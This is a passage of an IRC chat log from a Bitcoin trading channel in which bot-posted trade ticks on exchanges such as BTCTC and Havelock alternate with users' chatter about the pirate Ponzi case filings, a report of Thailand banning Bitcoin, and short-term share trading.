0.2248 BTC [-] Jul 29 18:34:52 [BTCTC] [ACTIVEMINING] 7 @ 0.008993 = 0.063 BTC [+] Jul 29 18:35:33 [BTCTC] [ACTIVEMINING] 1 @ 0.008993 BTC [+] Jul 29 18:39:09 Wow, if I'm reading the SEC docs right, pirate was paying out more than he was taking in from March till August 2012. Jul 29 18:39:20 Never mind the 5k BTC he donated to Vandroiy. Jul 29 18:39:20 [BTCTC] [ACTIVEMINING] 12 @ 0.00899 = 0.1079 BTC [-] Jul 29 18:39:33 [HAVELOCK] [AM100] 2 @ 0.042491 = 0.085 BTC [+] Jul 29 18:39:39 [BTCTC] [BITVPS] 10 @ 0.001857 = 0.0186 BTC [-] Jul 29 18:39:48 Why he kept going all that time, if true, just shows stupidity. Is it true though. Jul 29 18:39:49 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.003058 = 0.0061 BTC [+] Jul 29 18:40:18 [HAVELOCK] [SDSTM] 4 @ 0.0089984 = 0.036 BTC [+] Jul 29 18:40:32 [HAVELOCK] [SDSTM] 15 @ 0.0089985 = 0.135 BTC [+] Jul 29 18:40:45 http://ia600904.us.archive.org/35/items/gov.uscourts.txed.146063/gov.uscourts.txed.146063.4.5.pdf Jul 29 18:40:46 Clause 14 page 7 Jul 29 18:41:12 I'd cut-n-paste but my browser won't let me Jul 29 18:41:31 [BTCTC] [TAT.ASICMINER] 10 @ 0.04222 = 0.4222 BTC [-] Jul 29 18:41:37 Yeah not sure I believe that. Jul 29 18:41:45 [BTCTC] [ASICMINER-PT] 1 @ 4.476 BTC [-] Jul 29 18:42:02 [BTCTC] [ASICMINER-PT] 1 @ 4.481 BTC [+] Jul 29 18:42:11 [BTCTC] [ACTIVEMINING] 49 @ 0.008989 = 0.4405 BTC [-] Jul 29 18:42:30 [BTCTC] [ASICMINER-PT] 3 @ 4.488 = 13.464 BTC [+] Jul 29 18:43:52 Well it was ponzi intent from the start I'm sure. But the ponzi was only bleeding for the last 5 months, is how I read it. Jul 29 18:44:13 [BTCTC] [FIMB] 60 @ 0.01003 = 0.6018 BTC [-] Jul 29 18:44:34 If true and pirate were smart he'd have stopped after the direction was clear, like after 2 months. Jul 29 18:45:34 But who knows. Only pirate himself has a clue of the real numbers, and I doubt he kept track of even that. Jul 29 18:46:18 How Jul 29 18:46:20 [HAVELOCK] [HIM] 4 @ 0.1998 = 0.7992 BTC [-] Jul 29 18:46:23 [BTCTC] [DMS.MINING] 50 @ 0.01042 = 0.521 BTC [-] Jul 29 18:46:23 [BTCTC] [DMS.MINING] 20 @ 0.01042 = 0.2084 BTC [-] Jul 29 18:47:04 [BTCTC] [DMS.MINING] 30 @ 0.0104 = 0.312 BTC [-] Jul 29 18:47:22 [BTCTC] [BASIC-MINING] 1 @ 0.5101 BTC [-] Jul 29 18:47:36 True. I'd be impressed if anyone on this chat (other than MP) could name 2 or 3 address of mine though :) You have reason to know 1 or 2 goat, perhaps. Jul 29 18:47:45 Neil_ for one i;m surprised no gpumax co-conspirators indictment. Jul 29 18:48:38 [BTCTC] [ASICMINER-PT] 2 @ 4.487 = 8.974 BTC [-] Jul 29 18:48:44 i'm an 8 year old kid in the phillipines Jul 29 18:48:54 [BTCTC] [TAT.ASICMINER] 25 @ 0.04331 = 1.0828 BTC [+] Jul 29 18:48:55 [BTCTC] [ASICMINER-PT] 3 @ 4.488 = 13.464 BTC [+] Jul 29 18:48:57 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.002872 = 0.2872 BTC [-] Jul 29 18:49:10 Perhaps pirate's long-term plan was to blow up, confess, and keep the anon coinbases. Even that's serious money. Jul 29 18:49:17 [BTCTC] [ACTIVEMINING] 116 @ 0.008988 = 1.0426 BTC [-] Jul 29 18:49:19 [BTCTC] [LTC-MINING] 2 @ 0.2921 = 0.5842 BTC [-] Jul 29 18:49:23 [BTCTC] [TAT.ASICMINER] 25 @ 0.04339 = 1.0848 BTC [+] Jul 29 18:49:23 [BTCTC] [ACTIVEMINING] 42 @ 0.008989 = 0.3775 BTC [+] Jul 29 18:49:26 [BTCTC] [ACTIVEMINING] 178 @ 0.008989 = 1.6 BTC [+] Jul 29 18:49:27 [BTCTC] [TAT.ASICMINER] 50 @ 0.0434 = 2.17 BTC [+] Jul 29 18:49:57 Sure Jul 29 18:49:57 [BTCTC] [S.BBET-PT] 3 @ 0.001919 = 0.0058 BTC [-] Jul 29 18:49:58 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.002871 = 0.0287 BTC [-] Jul 29 18:49:59 [BTCTC] [LTC-MINING] 10 @ 0.292 = 2.92 BTC [-] Jul 29 18:50:09 For many people Jul 29 18:50:47 [BTCTC] [ACTIVEMINING] 25 @ 0.008713 = 0.2178 BTC [-] Jul 29 18:51:00 [BTCTC] [ACTIVEMINING] 12 @ 0.008712 = 0.1045 BTC [-] Jul 29 18:51:11 [BTCTC] [ACTIVEMINING] 1 @ 0.008712 BTC [-] Jul 29 18:51:20 [BTCTC] [ACTIVEMINING] 2 @ 0.008699 = 0.0174 BTC [-] Jul 29 18:51:23 [BTCTC] [ACTIVEMINING] 4 @ 0.008698 = 0.0348 BTC [-] Jul 29 18:51:28 Sleep time for me. I have my servitude tomorrow. Jul 29 18:51:42 [BTCTC] [TAT.VIRTUALMINE] 28 @ 0.00287 = 0.0804 BTC [-] Jul 29 18:51:54 hehe not for long. I'm doing just fine Jul 29 18:52:32 [BTCTC] [BASIC-MINING] 1 @ 0.51 BTC [-] Jul 29 18:53:51 [BTCTC] [S.MPOE-PT] 350 @ 0.0008358 = 0.2925 BTC [-] Jul 29 18:54:36 hehe assbot Jul 29 18:54:54 [BTCTC] [ACTIVEMINING] 1 @ 0.008986 BTC [+] Jul 29 18:54:59 [BTCTC] [S.MPOE-PT] 354 @ 0.0008357 = 0.2958 BTC [-] Jul 29 18:55:36 [BTCTC] [ASICMINER-PT] 3 @ 4.455 = 13.365 BTC [-] Jul 29 18:56:50 [BTCTC] [S.MPOE-PT] 146 @ 0.0008357 = 0.122 BTC [-] Jul 29 18:57:13 [BTCTC] [ACTIVEMINING] 25 @ 0.008503 = 0.2126 BTC [-] Jul 29 18:57:22 [BTCTC] [ACTIVEMINING] 62 @ 0.008502 = 0.5271 BTC [-] Jul 29 18:57:23 [BTCTC] [S.MPOE-PT] 400 @ 0.0008356 = 0.3342 BTC [-] Jul 29 18:57:24 [BTCTC] [ACTIVEMINING] 13 @ 0.0085 = 0.1105 BTC [-] Jul 29 18:57:56 [BTCTC] [S.MPOE-PT] 797 @ 0.0008355 = 0.6659 BTC [-] Jul 29 18:58:19 Damn ltc-global sure does go for a lot Jul 29 18:58:29 [BTCTC] [ACTIVEMINING] 25 @ 0.008501 = 0.2125 BTC [+] Jul 29 18:58:32 [BTCTC] [ACTIVEMINING] 75 @ 0.0085 = 0.6375 BTC [-] Jul 29 18:58:33 [BTCTC] [S.MPOE-PT] 493 @ 0.000835 = 0.4117 BTC [-] Jul 29 18:59:06 [BTCTC] [TAT.VIRTUALMINE] 130 @ 0.00288 = 0.3744 BTC [+] Jul 29 18:59:09 [BTCTC] [TAT.VIRTUALMINE] 372 @ 0.00287 = 1.0676 BTC [-] Jul 29 18:59:14 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.002861 = 0.0114 BTC [-] Jul 29 18:59:20 [BTCTC] [TAT.VIRTUALMINE] 120 @ 0.002817 = 0.338 BTC [-] Jul 29 18:59:23 [BTCTC] [TAT.VIRTUALMINE] 529 @ 0.002702 = 1.4294 BTC [-] Jul 29 18:59:27 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.002701 = 0.0135 BTC [-] Jul 29 18:59:28 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.002607 = 0.0052 BTC [-] Jul 29 18:59:33 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.002442 BTC [-] Jul 29 18:59:35 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.00241 = 0.0096 BTC [-] Jul 29 18:59:47 290ltc right now Jul 29 18:59:54 [BTCTC] [ACTIVEMINING] 25 @ 0.008503 = 0.2126 BTC [+] Jul 29 19:00:01 which I think the going rate for ltc is around 2.50 ~ 3 USD Jul 29 19:00:24 I was looking to buying up 10 shares so I could vote, but that's a pricey vote Jul 29 19:00:25 [BTCTC] [S.MPOE-PT] 99 @ 0.0008301 = 0.0822 BTC [-] Jul 29 19:01:13 That's around 10k just to vote Jul 29 19:01:31 [BTCTC] [ACTIVEMINING] 10 @ 0.008505 = 0.0851 BTC [+] Jul 29 19:01:32 For a share Jul 29 19:01:39 [BTCTC] [ACTIVEMINING] 25 @ 0.008503 = 0.2126 BTC [-] Jul 29 19:01:45 [BTCTC] [ACTIVEMINING] 15 @ 0.008502 = 0.1275 BTC [-] Jul 29 19:02:04 10,000 shares Jul 29 19:02:22 around 10.3M USD Jul 29 19:02:27 [BTCTC] [ACTIVEMINING] 35 @ 0.008502 = 0.2976 BTC [-] Jul 29 19:03:03 burnside still owns 90%ish Jul 29 19:03:19 [BTCTC] [ACTIVEMINING] 55 @ 0.008456 = 0.4651 BTC [-] Jul 29 19:03:44 [BTCTC] [ACTIVEMINING] 50 @ 0.008455 = 0.4228 BTC [-] Jul 29 19:03:57 [BTCTC] [ACTIVEMINING] 1 @ 0.008502 BTC [+] Jul 29 19:04:05 [BTCTC] [ACTIVEMINING] 60 @ 0.00845 = 0.507 BTC [-] Jul 29 19:04:24 [BTCTC] [ACTIVEMINING] 49 @ 0.008502 = 0.4166 BTC [+] Jul 29 19:04:45 cause the goat is not to be trusted Jul 29 19:05:27 [BTCTC] [ACTIVEMINING] 1 @ 0.008502 BTC [+] Jul 29 19:05:34 [BTCTC] [ACTIVEMINING] 209 @ 0.008423 = 1.7604 BTC [-] Jul 29 19:07:18 [BTCTC] [ASICMINER-PT] 1 @ 4.487 BTC [+] Jul 29 19:08:19 [BTCTC] [ACTIVEMINING] 1 @ 0.008503 BTC [+] Jul 29 19:09:09 [BTCTC] [TAT.VIRTUALMINE] 200 @ 0.0026 = 0.52 BTC [+] Jul 29 19:09:13 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.0024 = 0.12 BTC [-] Jul 29 19:09:18 [BTCTC] [TAT.VIRTUALMINE] 300 @ 0.0024 = 0.72 BTC [-] Jul 29 19:10:33 [BTCTC] [ACTIVEMINING] 25 @ 0.008504 = 0.2126 BTC [+] Jul 29 19:11:23 [MPEX] [S.MPOE] 7009 @ 0.00080576 = 5.6476 BTC [-] Jul 29 19:11:25 [MPEX] [S.MPOE] 8991 @ 0.0008056 = 7.2431 BTC [-] Jul 29 19:11:28 [BTCTC] [ACTIVEMINING] 45 @ 0.008503 = 0.3826 BTC [-] Jul 29 19:11:33 [BTCTC] [ACTIVEMINING] 51 @ 0.00888 = 0.4529 BTC [+] Jul 29 19:12:40 [BTCTC] [ACTIVEMINING] 2 @ 0.008878 = 0.0178 BTC [-] Jul 29 19:13:01 [BTCTC] [TAT.ASICMINER] 10 @ 0.04328 = 0.4328 BTC [-] Jul 29 19:13:07 [BTCTC] [TAT.ASICMINER] 41 @ 0.04328 = 1.7745 BTC [-] Jul 29 19:14:00 [BTCTC] [TAT.ASICMINER] 9 @ 0.04328 = 0.3895 BTC [-] Jul 29 19:14:11 [BTCTC] [TAT.ASICMINER] 1 @ 0.04332 BTC [+] Jul 29 19:15:39 [BTCTC] [ACTIVEMINING] 50 @ 0.00848 = 0.424 BTC [-] Jul 29 19:21:41 [BTCTC] [ACTIVEMINING] 50 @ 0.008483 = 0.4242 BTC [+] Jul 29 19:21:45 [BTCTC] [ACTIVEMINING] 25 @ 0.008482 = 0.2121 BTC [-] Jul 29 19:21:48 [BTCTC] [ACTIVEMINING] 1 @ 0.00848 BTC [-] Jul 29 19:21:51 [BTCTC] [ACTIVEMINING] 324 @ 0.008435 = 2.7329 BTC [-] Jul 29 19:25:43 Thai central bank rules Bitcoin to be illegal (Wired UK) Jul 29 19:26:04 [BTCTC] [ACTIVEMINING] 188 @ 0.008432 = 1.5852 BTC [-] Jul 29 19:26:37 Chaang-Noi: so what does that mean? Jul 29 19:26:40 for you at least? Jul 29 19:27:40 [BTCTC] [TAT.ASICMINER] 20 @ 0.04397 = 0.8794 BTC [+] Jul 29 19:28:34 isn't it hard to outlaw it Jul 29 19:29:46 lmao Jul 29 19:30:33 Why would wired publish such a thing Jul 29 19:30:50 Chaang-Noi: you should invest in my sit around and do nothing fund Jul 29 19:30:50 how bout it? Jul 29 19:30:55 Chaang-Noi, no, bitcoin is actually illegal in thailand. bitcoin steals the B from the thai baht Jul 29 19:31:29 Rulother_, wired is stupid Jul 29 19:31:37 wired is sometimes smart Jul 29 19:31:43 but not often Jul 29 19:31:52 They used to be a good source Jul 29 19:31:55 I've read some good articles in there before. Jul 29 19:32:47 no, i'm not high. Jul 29 19:32:52 Sad day Jul 29 19:34:02 Chaang-Noi, lol, i wasn't exactly serious about that :P Jul 29 19:34:36 [HAVELOCK] [AM100] 5 @ 0.04121 = 0.2061 BTC [-] Jul 29 19:34:58 [HAVELOCK] [AM100] 1 @ 0.0412 BTC [-] Jul 29 19:35:03 [HAVELOCK] [AM100] 1 @ 0.04114001 BTC [-] Jul 29 19:35:09 [HAVELOCK] [AM100] 5 @ 0.04113 = 0.2057 BTC [-] Jul 29 19:35:15 [HAVELOCK] [AM100] 5 @ 0.04112 = 0.2056 BTC [-] Jul 29 19:35:20 [HAVELOCK] [AM100] 15 @ 0.04111031 = 0.6167 BTC [-] Jul 29 19:35:25 [HAVELOCK] [AM100] 15 @ 0.04111011 = 0.6167 BTC [-] Jul 29 19:35:32 [HAVELOCK] [AM100] 3 @ 0.0411 = 0.1233 BTC [-] Jul 29 19:36:20 [BTCTC] [ASICMINER-PT] 1 @ 4.414 BTC [-] Jul 29 19:37:27 [BTCTC] [DMS.SELLING] 1 @ 0.02169 BTC [+] Jul 29 19:38:14 [BTCTC] [ASICMINER-PT] 1 @ 4.414 BTC [-] Jul 29 19:38:32 [HAVELOCK] [HIM] 6 @ 0.1998 = 1.1988 BTC [-] Jul 29 19:38:35 [HAVELOCK] [HIM] 4 @ 0.19999998 = 0.8 BTC [+] Jul 29 19:40:48 [BTCTC] [ACTIVEMINING] 50 @ 0.008501 = 0.4251 BTC [+] Jul 29 19:41:11 [BTCTC] [BASIC-MINING] 1 @ 0.506 BTC [-] Jul 29 19:41:13 [BTCTC] [BASIC-MINING] 1 @ 0.4801 BTC [-] Jul 29 19:41:17 [BTCTC] [BASIC-MINING] 10 @ 0.48 = 4.8 BTC [-] Jul 29 19:41:20 [BTCTC] [BASIC-MINING] 1 @ 0.4793 BTC [-] Jul 29 19:41:24 later Jul 29 19:41:30 [BTCTC] [BASIC-MINING] 6 @ 0.4792 = 2.8752 BTC [-] Jul 29 19:41:32 [BTCTC] [BASIC-MINING] 1 @ 0.479 BTC [-] Jul 29 19:41:34 [BTCTC] [BASIC-MINING] 1 @ 0.4758 BTC [-] Jul 29 19:41:36 [BTCTC] [BASIC-MINING] 2 @ 0.46 = 0.92 BTC [-] Jul 29 19:41:38 [BTCTC] [BASIC-MINING] 1 @ 0.452 BTC [-] Jul 29 19:41:40 [BTCTC] [BASIC-MINING] 2 @ 0.45 = 0.9 BTC [-] Jul 29 19:41:43 [BTCTC] [BASIC-MINING] 10 @ 0.45 = 4.5 BTC [-] Jul 29 19:41:46 [BTCTC] [BASIC-MINING] 2 @ 0.43 = 0.86 BTC [-] Jul 29 19:41:48 [BTCTC] [BASIC-MINING] 2 @ 0.422 = 0.844 BTC [-] Jul 29 19:41:57 [BTCTC] [ACTIVEMINING] 255 @ 0.008599 = 2.1927 BTC [+] Jul 29 19:41:58 [BTCTC] [BASIC-MINING] 1 @ 0.4199 BTC [-] Jul 29 19:42:00 [BTCTC] [ACTIVEMINING] 745 @ 0.0086 = 6.407 BTC [+] Jul 29 19:42:01 [BTCTC] [BASIC-MINING] 3 @ 0.4 = 1.2 BTC [-] Jul 29 19:42:03 [BTCTC] [BASIC-MINING] 2 @ 0.4 = 0.8 BTC [-] Jul 29 19:42:11 [HAVELOCK] [AM100] 247 @ 0.0411 = 10.1517 BTC [-] Jul 29 19:42:14 [HAVELOCK] [AM100] 775 @ 0.04102001 = 31.7905 BTC [-] Jul 29 19:42:16 [HAVELOCK] [AM100] 12 @ 0.04102 = 0.4922 BTC [-] Jul 29 19:42:18 [HAVELOCK] [AM100] 100 @ 0.04101 = 4.101 BTC [-] Jul 29 19:42:20 [HAVELOCK] [AM100] 26 @ 0.041001 = 1.066 BTC [-] Jul 29 19:42:22 [HAVELOCK] [AM100] 100 @ 0.0410002 = 4.1 BTC [-] Jul 29 19:42:25 [HAVELOCK] [AM100] 3500 @ 0.041 = 143.5 BTC [-] Jul 29 19:42:27 [HAVELOCK] [AM100] 30 @ 0.041 = 1.23 BTC [-] Jul 29 19:42:29 [HAVELOCK] [AM100] 99 @ 0.04090101 = 4.0492 BTC [-] Jul 29 19:42:29 I would totally buy up in Basic right now Jul 29 19:42:30 [BTCTC] [BASIC-MINING] 1 @ 0.379 BTC [-] Jul 29 19:42:31 [HAVELOCK] [AM100] 1 @ 0.0409 BTC [-] Jul 29 19:42:33 [HAVELOCK] [AM100] 1 @ 0.0407 BTC [-] Jul 29 19:42:35 [HAVELOCK] [AM100] 1 @ 0.0405 BTC [-] Jul 29 19:42:37 [BTCTC] [BASIC-MINING] 2 @ 0.374 = 0.748 BTC [-] Jul 29 19:42:42 After it stops falling of course Jul 29 19:43:06 lol the falling knife Jul 29 19:43:33 [HAVELOCK] [AM100] 1 @ 0.042 BTC [+] Jul 29 19:45:03 Say I buy 175 shares at .35 and wait for it go back to .55, I just made 35btc. It will probably drop that low and bounce back to around that. Jul 29 19:45:34 [BTCTC] [ASICMINER-PT] 2 @ 4.47 = 8.94 BTC [+] Jul 29 19:45:38 you can not make more btc than what btc someone is capable of losing. Jul 29 19:45:43 [BTCTC] [ASICMINER-PT] 1 @ 4.487 BTC [+] Jul 29 19:45:47 [BTCTC] [ASICMINER-PT] 1 @ 4.488 BTC [+] Jul 29 19:45:53 if there's indeed 35 btc in that market maybe you can make 35 btc. Jul 29 19:46:08 if there's 100 dudes chasing it and 10 btc total then you can make .1 on average. Jul 29 19:46:14 [BTCTC] [ACTIVEMINING] 50 @ 0.008501 = 0.4251 BTC [-] Jul 29 19:46:44 [BTCTC] [COGNITIVE] 1 @ 0.5221 BTC [-] Jul 29 19:48:27 [HAVELOCK] [AM100] 2 @ 0.042 = 0.084 BTC [+] Jul 29 19:48:34 [BTCTC] [ACTIVEMINING] 100 @ 0.0085 = 0.85 BTC [-] Jul 29 19:48:36 [BTCTC] [ACTIVEMINING] 125 @ 0.0085 = 1.0625 BTC [-] Jul 29 19:49:36 [BTCTC] [ACTIVEMINING] 1 @ 0.008647 BTC [+] Jul 29 19:51:09 It's possible, done it over and over again with Cog and Basic. It may not happen in a single day, but it's possible. Jul 29 19:51:24 [HAVELOCK] [SDSTM] 3 @ 0.0089985 = 0.027 BTC [+] Jul 29 19:53:09 [BTCTC] [ACTIVEMINING] 8 @ 0.008647 = 0.0692 BTC [+] Jul 29 19:53:50 [BTCTC] [TAT.VIRTUALMINE] 399 @ 0.0025 = 0.9975 BTC [+] Jul 29 19:53:52 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0025 BTC [+] Jul 29 19:53:54 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00238 BTC [-] Jul 29 19:53:56 [BTCTC] [TAT.VIRTUALMINE] 300 @ 0.00235 = 0.705 BTC [-] Jul 29 19:53:58 [BTCTC] [TAT.VIRTUALMINE] 299 @ 0.00231 = 0.6907 BTC [-] Jul 29 19:54:11 [HAVELOCK] [AM100] 1 @ 0.0403 BTC [-] Jul 29 19:54:12 [HAVELOCK] [AM100] 12 @ 0.04010001 = 0.4812 BTC [-] Jul 29 19:56:11 [BTCTC] [ACTIVEMINING] 25 @ 0.008643 = 0.2161 BTC [-] Jul 29 19:56:13 [BTCTC] [ACTIVEMINING] 50 @ 0.008644 = 0.4322 BTC [+] Jul 29 19:56:17 [BTCTC] [ACTIVEMINING] 62 @ 0.008646 = 0.5361 BTC [+] Jul 29 19:56:20 [BTCTC] [ACTIVEMINING] 2 @ 0.008695 = 0.0174 BTC [+] Jul 29 19:56:23 [BTCTC] [ACTIVEMINING] 100 @ 0.008749 = 0.8749 BTC [+] Jul 29 19:56:25 [BTCTC] [ACTIVEMINING] 41 @ 0.00875 = 0.3588 BTC [+] Jul 29 19:57:15 [BTCTC] [TAT.MINIGAME] 3 @ 0.0003 = 0.0009 BTC [-] Jul 29 19:58:10 but not a high volume Jul 29 19:58:34 Of basic? Jul 29 19:58:40 [BTCTC] [ACTIVEMINING] 25 @ 0.008506 = 0.2127 BTC [-] Jul 29 19:58:49 Selling high volume of basic usually takes a few days Jul 29 19:58:50 [BTCTC] [ACTIVEMINING] 276 @ 0.008505 = 2.3474 BTC [-] Jul 29 19:58:56 Their average volume is around 250 Jul 29 19:59:17 I have done what you are talking about on COGNITIVE many times, but I doubt it is doable with more than a few shares Jul 29 19:59:25 [BTCTC] [ACTIVEMINING] 42 @ 0.008504 = 0.3572 BTC [-] Jul 29 19:59:39 Cog is one of my favorites to do it with. Jul 29 19:59:48 That sounded kind of dirty. Jul 29 19:59:54 :) Jul 29 20:00:37 [BTCTC] [ACTIVEMINING] 25 @ 0.008504 = 0.2126 BTC [-] Jul 29 20:05:20 [BTCTC] [BASIC-MINING] 18 @ 0.615 = 11.07 BTC [+] Jul 29 20:05:37 [BTCTC] [BASIC-MINING] 15 @ 0.62 = 9.3 BTC [+] Jul 29 20:05:52 [BTCTC] [BASIC-MINING] 20 @ 0.63 = 12.6 BTC [+] Jul 29 20:06:28 see :) Jul 29 20:06:43 [BTCTC] [BASIC-MINING] 1 @ 0.431 BTC [-] Jul 29 20:06:45 [BTCTC] [BASIC-MINING] 2 @ 0.43 = 0.86 BTC [-] Jul 29 20:06:53 [HAVELOCK] [AM100] 8 @ 0.04185 = 0.3348 BTC [+] Jul 29 20:07:02 [HAVELOCK] [AM100] 10 @ 0.04189 = 0.4189 BTC [+] Jul 29 20:07:08 [BTCTC] [BASIC-MINING] 1 @ 0.43 BTC [-] Jul 29 20:07:22 [HAVELOCK] [AM100] 20 @ 0.042 = 0.84 BTC [+] Jul 29 20:07:46 [HAVELOCK] [AM100] 7 @ 0.042 = 0.294 BTC [+] Jul 29 20:08:25 [BTCTC] [ACTIVEMINING] 25 @ 0.008687 = 0.2172 BTC [+] Jul 29 20:08:26 [BTCTC] [LTC-ATF.B2] 114 @ 0.0103 = 1.1742 BTC [-] Jul 29 20:09:04 [BTCTC] [ACTIVEMINING] 25 @ 0.008685 = 0.2171 BTC [-] Jul 29 20:09:47 [BTCTC] [ASICMINER-PT] 2 @ 4.48 = 8.96 BTC [-] Jul 29 20:10:27 [BTCTC] [ACTIVEMINING] 25 @ 0.008685 = 0.2171 BTC [-] Jul 29 20:10:38 [BTCTC] [ACTIVEMINING] 1 @ 0.008685 BTC [-] Jul 29 20:11:56 [BTCTC] [ACTIVEMINING] 25 @ 0.008685 = 0.2171 BTC [-] Jul 29 20:12:36 [BTCTC] [ACTIVEMINING] 25 @ 0.008685 = 0.2171 BTC [-] Jul 29 20:13:30 [BTCTC] [ACTIVEMINING] 36 @ 0.008684 = 0.3126 BTC [-] Jul 29 20:14:03 [BTCTC] [BTC-TRADING-PT] 1 @ 0.88 BTC [+] Jul 29 20:14:25 [BTCTC] [ACTIVEMINING] 50 @ 0.008686 = 0.4343 BTC [+] Jul 29 20:17:36 [HAVELOCK] [AM100] 5 @ 0.04199 = 0.21 BTC [-] Jul 29 20:18:13 [HAVELOCK] [AM100] 1 @ 0.04199 BTC [-] Jul 29 20:18:31 [BTCTC] [BASIC-MINING] 1 @ 0.5099 BTC [+] Jul 29 20:21:42 [BTCTC] [ACTIVEMINING] 3 @ 0.008683 = 0.026 BTC [-] Jul 29 20:22:20 [BTCTC] [ACTIVEMINING] 37 @ 0.00852 = 0.3152 BTC [-] Jul 29 20:22:55 [BTCTC] [BASIC-MINING] 2 @ 0.425 = 0.85 BTC [-] Jul 29 20:22:57 [BTCTC] [BASIC-MINING] 3 @ 0.425 = 1.275 BTC [-] Jul 29 20:23:07 [BTCTC] [ACTIVEMINING] 38 @ 0.008682 = 0.3299 BTC [+] Jul 29 20:23:10 [BTCTC] [ACTIVEMINING] 82 @ 0.008683 = 0.712 BTC [+] Jul 29 20:25:34 [BTCTC] [ACTIVEMINING] 25 @ 0.008523 = 0.2131 BTC [-] Jul 29 20:26:00 [BTCTC] [ASICMINER-PT] 4 @ 4.45 = 17.8 BTC [-] Jul 29 20:26:58 [BTCTC] [BTC-TRADING-PT] 1 @ 0.883 BTC [+] Jul 29 20:32:32 [HAVELOCK] [HIM] 1 @ 0.1899 BTC [-] Jul 29 20:32:34 [HAVELOCK] [HIM] 12 @ 0.1898 = 2.2776 BTC [-] Jul 29 20:36:59 [BTCTC] [ACTIVEMINING] 25 @ 0.008682 = 0.2171 BTC [+] Jul 29 20:37:01 [BTCTC] [ACTIVEMINING] 21 @ 0.008683 = 0.1823 BTC [+] Jul 29 20:39:44 [BTCTC] [ASICMINER-PT] 1 @ 4.487 BTC [+] Jul 29 20:39:47 [BTCTC] [ASICMINER-PT] 1 @ 4.488 BTC [+] Jul 29 20:39:51 [BTCTC] [ASICMINER-PT] 1 @ 4.488 BTC [+] Jul 29 20:39:54 [BTCTC] [ASICMINER-PT] 1 @ 4.489 BTC [+] Jul 29 20:39:56 [BTCTC] [ASICMINER-PT] 1 @ 4.489 BTC [+] Jul 29 20:40:26 i don't see basic in the next days at .55 Jul 29 20:40:52 [BTCTC] [ACTIVEMINING] 74 @ 0.008684 = 0.6426 BTC [+] Jul 29 20:42:20 [BTCTC] [ACTIVEMINING] 42 @ 0.008684 = 0.3647 BTC [+] Jul 29 20:47:23 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.00255 = 0.0128 BTC [+] Jul 29 20:47:24 [MPEX] [S.MPOE] 9959 @ 0.0008056 = 8.023 BTC [-] Jul 29 20:47:26 [MPEX] [S.MPOE] 1741 @ 0.00080539 = 1.4022 BTC [-] Jul 29 20:49:02 [HAVELOCK] [SDSTM] 56 @ 0.0089984 = 0.5039 BTC [-] Jul 29 20:50:29 [BTCTC] [ACTIVEMINING] 2 @ 0.008681 = 0.0174 BTC [-] Jul 29 20:52:25 [BTCTC] [ACTIVEMINING] 256 @ 0.008681 = 2.2223 BTC [-] Jul 29 20:53:50 [MPEX] [S.MPOE] 6250 @ 0.00080539 = 5.0337 BTC [-] Jul 29 20:57:30 [BTCTC] [BASIC-MINING] 6 @ 0.425 = 2.55 BTC [-] Jul 29 20:57:34 [BTCTC] [BASIC-MINING] 3 @ 0.425 = 1.275 BTC [-] Jul 29 21:00:01 [BTCTC] [TAT.ASICMINER] 1 @ 0.04399 BTC [+] Jul 29 21:02:39 [HAVELOCK] [HIM] 1 @ 0.1908 BTC [+] Jul 29 21:05:48 [BTCTC] [ASICMINER-PT] 1 @ 4.42 BTC [-] Jul 29 21:06:29 [BTCTC] [ACTIVEMINING] 3 @ 0.008681 = 0.026 BTC [-] Jul 29 21:06:55 [BTCTC] [ACTIVEMINING] 20 @ 0.008682 = 0.1736 BTC [+] Jul 29 21:06:57 [BTCTC] [ACTIVEMINING] 521 @ 0.008683 = 4.5238 BTC [+] Jul 29 21:07:20 [BTCTC] [ACTIVEMINING] 18 @ 0.008681 = 0.1563 BTC [-] Jul 29 21:08:43 [BTCTC] [ACTIVEMINING] 30 @ 0.008683 = 0.2605 BTC [+] Jul 29 21:09:10 [BTCTC] [ACTIVEMINING] 1000 @ 0.008681 = 8.681 BTC [-] Jul 29 21:09:57 [BTCTC] [ACTIVEMINING] 37 @ 0.008683 = 0.3213 BTC [+] Jul 29 21:09:59 [BTCTC] [ACTIVEMINING] 134 @ 0.008684 = 1.1637 BTC [+] Jul 29 21:10:13 Looks like I'm going to open up a ticket against BFL now :\. was hoping a better experience. But what was I thinking lol Jul 29 21:10:24 did you call? Jul 29 21:10:27 [BTCTC] [ACTIVEMINING] 1070 @ 0.008681 = 9.2887 BTC [-] Jul 29 21:11:26 [BTCTC] [BASIC-MINING] 2 @ 0.4399 = 0.8798 BTC [+] Jul 29 21:11:27 Yeah was hold for nearly 30mins Jul 29 21:11:29 [BTCTC] [BASIC-MINING] 1 @ 0.4399 BTC [+] Jul 29 21:11:30 [BTCTC] [BASIC-MINING] 6 @ 0.44 = 2.64 BTC [+] Jul 29 21:11:54 I guess I'll give them another try by phone in an hour or so. Jul 29 21:12:43 [BTCTC] [BASIC-MINING] 1 @ 0.4458 BTC [+] Jul 29 21:12:46 [BTCTC] [BASIC-MINING] 1 @ 0.4459 BTC [+] Jul 29 21:12:50 [BTCTC] [BASIC-MINING] 3 @ 0.4459 = 1.3377 BTC [+] Jul 29 21:13:00 [BTCTC] [BASIC-MINING] 1 @ 0.4459 BTC [+] Jul 29 21:13:30 [BTCTC] [TAT.MINIGAME] 702 @ 0.000295 = 0.2071 BTC [-] Jul 29 21:13:33 [BTCTC] [ACTIVEMINING] 261 @ 0.008681 = 2.2657 BTC [-] Jul 29 21:13:34 [BTCTC] [TAT.MINIGAME] 1997 @ 0.0003 = 0.5991 BTC [+] Jul 29 21:13:38 [BTCTC] [TAT.MINIGAME] 2468 @ 0.0003074 = 0.7587 BTC [+] Jul 29 21:13:40 [BTCTC] [TAT.MINIGAME] 4512 @ 0.0003075 = 1.3874 BTC [+] Jul 29 21:13:41 [BTCTC] [TAT.MINIGAME] 149 @ 0.00031 = 0.0462 BTC [+] Jul 29 21:13:43 [BTCTC] [TAT.MINIGAME] 